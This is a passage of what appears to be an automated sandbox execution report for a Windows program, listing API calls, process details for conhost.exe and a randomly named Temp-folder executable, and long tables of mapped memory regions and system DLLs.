lpFileSizeHigh=0x0) returned 0x1784a0 [0061.259] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2400000 [0061.260] ReadFile (in: hFile=0x204, lpBuffer=0x2400000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19a564, lpOverlapped=0x0 | out: lpBuffer=0x2400000*, lpNumberOfBytesRead=0x19a564*=0x1784a0, lpOverlapped=0x0) returned 1 [0061.288] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2580000 [0061.321] CloseHandle (hObject=0x204) returned 1 [0061.322] VirtualFree (lpAddress=0x2400000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.380] VirtualFree (lpAddress=0x2580000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.400] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x2350000) returned 0x0 [0061.402] ExitProcess (uExitCode=0x0) [0061.421] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fa498 | out: hHeap=0x4e0000) returned 1 Thread: id = 10 os_tid = 0x6a8 Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x8246000" os_pid = "0x854" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xbac" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f213" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 372 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 373 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 374 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 375 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 376 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 377 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 378 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 379 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 380 start_va = 0x7ff70bfc0000 end_va = 0x7ff70bfd0fff monitored = 0 entry_point = 0x7ff70bfc16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 381 start_va = 0x7ffd0d950000 end_va = 0x7ffd0db10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 382 start_va = 0x600000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 383 start_va = 0x7ffd0c220000 end_va = 0x7ffd0c2ccfff monitored = 0 entry_point = 0x7ffd0c2381a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 384 start_va = 0x7ffd0a070000 end_va = 0x7ffd0a257fff monitored = 0 entry_point = 0x7ffd0a09ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 385 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 386 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 387 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 388 start_va = 0x7ffd0b040000 end_va = 0x7ffd0b0dcfff monitored = 0 entry_point = 0x7ffd0b0478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 389 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 390 start_va = 0x600000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 391 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 392 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 393 start_va = 0x7ffd02040000 end_va = 0x7ffd02098fff monitored = 0 entry_point = 0x7ffd0204fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 394 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 395 start_va = 0x7ffd0bfa0000 end_va = 0x7ffd0c21cfff monitored = 0 entry_point = 0x7ffd0c074970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 396 start_va = 0x7ffd0b370000 end_va = 0x7ffd0b48bfff monitored = 0 entry_point = 0x7ffd0b3b02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 397 start_va = 0x7ffd0a000000 end_va = 0x7ffd0a069fff monitored = 0 entry_point = 0x7ffd0a036d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 398 start_va = 0x7ffd0b490000 end_va = 0x7ffd0b5e5fff monitored = 0 entry_point = 0x7ffd0b49a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 399 start_va = 0x7ffd0b850000 end_va = 0x7ffd0b9d5fff monitored = 0 entry_point = 0x7ffd0b89ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 400 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 401 start_va = 0x7ffd0ae80000 end_va = 0x7ffd0afc2fff monitored = 0 entry_point = 0x7ffd0aea8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 402 start_va = 0x7ffd0ae20000 end_va = 0x7ffd0ae7afff monitored = 0 entry_point = 0x7ffd0ae338b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 403 start_va = 0x7ffd0b270000 end_va = 0x7ffd0b2aafff monitored = 0 entry_point = 0x7ffd0b2712f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 404 start_va = 0x7ffd0ad50000 end_va = 0x7ffd0ae10fff monitored = 0 entry_point = 0x7ffd0ad70da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 405 start_va = 0x7ffd084c0000 end_va = 0x7ffd08645fff monitored = 0 entry_point = 0x7ffd0850d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 406 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 407 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 408 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 409 start_va = 0x9d0000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 410 start_va = 0xb60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 411 start_va = 0x1f60000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 412 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 413 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 414 start_va = 0x7ffd0c2d0000 end_va = 0x7ffd0d82efff monitored = 0 entry_point = 0x7ffd0c4311f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 415 start_va = 0x7ffd0ac50000 end_va = 0x7ffd0ac92fff monitored = 0 entry_point = 0x7ffd0ac64b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 416 start_va = 0x7ffd0a320000 end_va = 0x7ffd0a963fff monitored = 0 entry_point = 0x7ffd0a4e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 417 start_va = 0x7ffd0b140000 end_va = 0x7ffd0b1e6fff monitored = 0 entry_point = 0x7ffd0b1558d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 418 start_va = 0x7ffd0b310000 end_va = 0x7ffd0b361fff monitored = 0 entry_point = 0x7ffd0b31f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 419 start_va = 0x7ffd09ff0000 end_va = 0x7ffd09ffefff monitored = 0 entry_point = 0x7ffd09ff3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 420 start_va = 0x7ffd0a260000 end_va = 0x7ffd0a314fff monitored = 0 entry_point = 0x7ffd0a2a22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 421 start_va = 0x7ffd09f90000 end_va = 0x7ffd09fdafff monitored = 0 entry_point = 0x7ffd09f935f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 422 start_va = 0x7ffd09f70000 end_va = 0x7ffd09f83fff monitored = 0 entry_point = 0x7ffd09f752e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 423 start_va = 0x7ffd088f0000 end_va = 0x7ffd08985fff monitored = 0 entry_point = 0x7ffd08915570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 424 start_va = 0x20e0000 end_va = 0x22dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 425 start_va = 0x22e0000 end_va = 0x2616fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 426 start_va = 0x2620000 end_va = 0x2836fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 427 start_va = 0x2840000 end_va = 0x2a50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 428 start_va = 0x1f60000 end_va = 0x2069fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 429 start_va = 0x20d0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 430 start_va = 0x2a60000 end_va = 0x2c70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 431 start_va = 0x20e0000 end_va = 0x21f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 432 start_va = 0x22d0000 end_va = 0x22dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 433 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 434 start_va = 0x7ffd0ba00000 end_va = 0x7ffd0bb59fff monitored = 0 entry_point = 0x7ffd0ba438e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 435 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 436 start_va = 0x2200000 end_va = 0x22bbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 437 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 438 start_va = 0x7ffd077f0000 end_va = 0x7ffd07811fff monitored = 0 entry_point = 0x7ffd077f1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 439 start_va = 0x7ffd086b0000 end_va = 0x7ffd086c2fff monitored = 0 entry_point = 0x7ffd086b2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 440 start_va = 0x7ffd09d80000 end_va = 0x7ffd09dd5fff monitored = 0 entry_point = 0x7ffd09d90bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 441 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 442 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 443 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 444 start_va = 0x1d0000 end_va = 0x1d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 445 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 446 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 447 start_va = 0x2c80000 end_va = 0x2e75fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c80000" filename = "" Region: id = 448 start_va = 0x7ffd00b70000 end_va = 0x7ffd00de3fff monitored = 0 entry_point = 0x7ffd00be0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 449 start_va = 0x680000 end_va = 0x680fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 450 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 451 start_va = 0x2e80000 end_va = 0x2f5cfff monitored = 0 entry_point = 0x2ede0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 452 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 453 start_va = 0x2e80000 end_va = 0x2f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 454 start_va = 0x2f80000 end_va = 0x317efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f80000" filename = "" Thread: id = 6 os_tid = 0x6b8 Thread: id = 7 os_tid = 0x63c Thread: id = 8 os_tid = 0x6dc Thread: id = 9 os_tid = 0xa6c Process: id = "4" image_name = "rvtzlpyrgs.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rvtzlpyrgs.exe" page_root = "0x58f37000" os_pid = "0xcf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xbac" cmd_line = "\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f213" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 504 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 505 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 506 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 507 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 508 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 509 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 510 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 511 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 512 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 513 start_va = 0x400000 end_va = 0x462fff monitored = 1 entry_point = 0x407a2d region_type = mapped_file name = "rvtzlpyrgs.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rvtzlpyrgs.exe") Region: id = 514 start_va = 0x77760000 end_va = 0x778dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 515 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 516 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 517 start_va = 0x7fff0000 end_va = 0x7ffd0d94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 518 start_va = 0x7ffd0d950000 end_va = 0x7ffd0db10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 519 start_va = 0x7ffd0db11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd0db11000" filename = "" Region: id = 526 start_va = 0x400000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 536 start_va = 0x4b0000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 537 start_va = 0x700a0000 end_va = 0x700effff monitored = 0 entry_point = 0x700b8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 538 start_va = 0x70020000 end_va = 0x70099fff monitored = 0 entry_point = 0x70033290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 539 start_va = 0x77340000 end_va = 0x7741ffff monitored = 0 entry_point = 0x77353980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 540 start_va = 0x700f0000 end_va = 0x700f7fff monitored = 0 entry_point = 0x700f17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 541 start_va = 0x570000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 542 start_va = 0x77340000 end_va = 0x7741ffff monitored = 0 entry_point = 0x77353980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 543 start_va = 0x75580000 end_va = 0x756fdfff monitored = 0 entry_point = 0x75631b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 544 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 545 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 546 start_va = 0x720000 end_va = 0x7ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 547 start_va = 0x75360000 end_va = 0x753befff monitored = 0 entry_point = 0x75364af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 548 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 549 start_va = 0x776b0000 end_va = 0x776f3fff monitored = 0 entry_point = 0x776c9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 550 start_va = 0x74e90000 end_va = 0x74f3cfff monitored = 0 entry_point = 0x74ea4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 551 start_va = 0x74490000 end_va = 0x744adfff monitored = 0 entry_point = 0x7449b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 552 start_va = 0x74480000 end_va = 0x74489fff monitored = 0 entry_point = 0x74482a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 553 start_va = 0x772c0000 end_va = 0x77317fff monitored = 0 entry_point = 0x773025c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 554 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 555 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 556 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 557 start_va = 0x74720000 end_va = 0x7480afff monitored = 0 entry_point = 0x7475d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 558 start_va = 0x75700000 end_va = 0x758bcfff monitored = 0 entry_point = 0x757e2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 559 start_va = 0x753c0000 end_va = 0x7547dfff monitored = 0 entry_point = 0x753f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 560 start_va = 0x75210000 end_va = 0x7535efff monitored = 0 entry_point = 0x752c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 561 start_va = 0x74f40000 end_va = 0x75086fff monitored = 0 entry_point = 0x74f51cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 562 start_va = 0x774a0000 end_va = 0x77531fff monitored = 0 entry_point = 0x774d8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 563 start_va = 0x8e0000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 564 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = 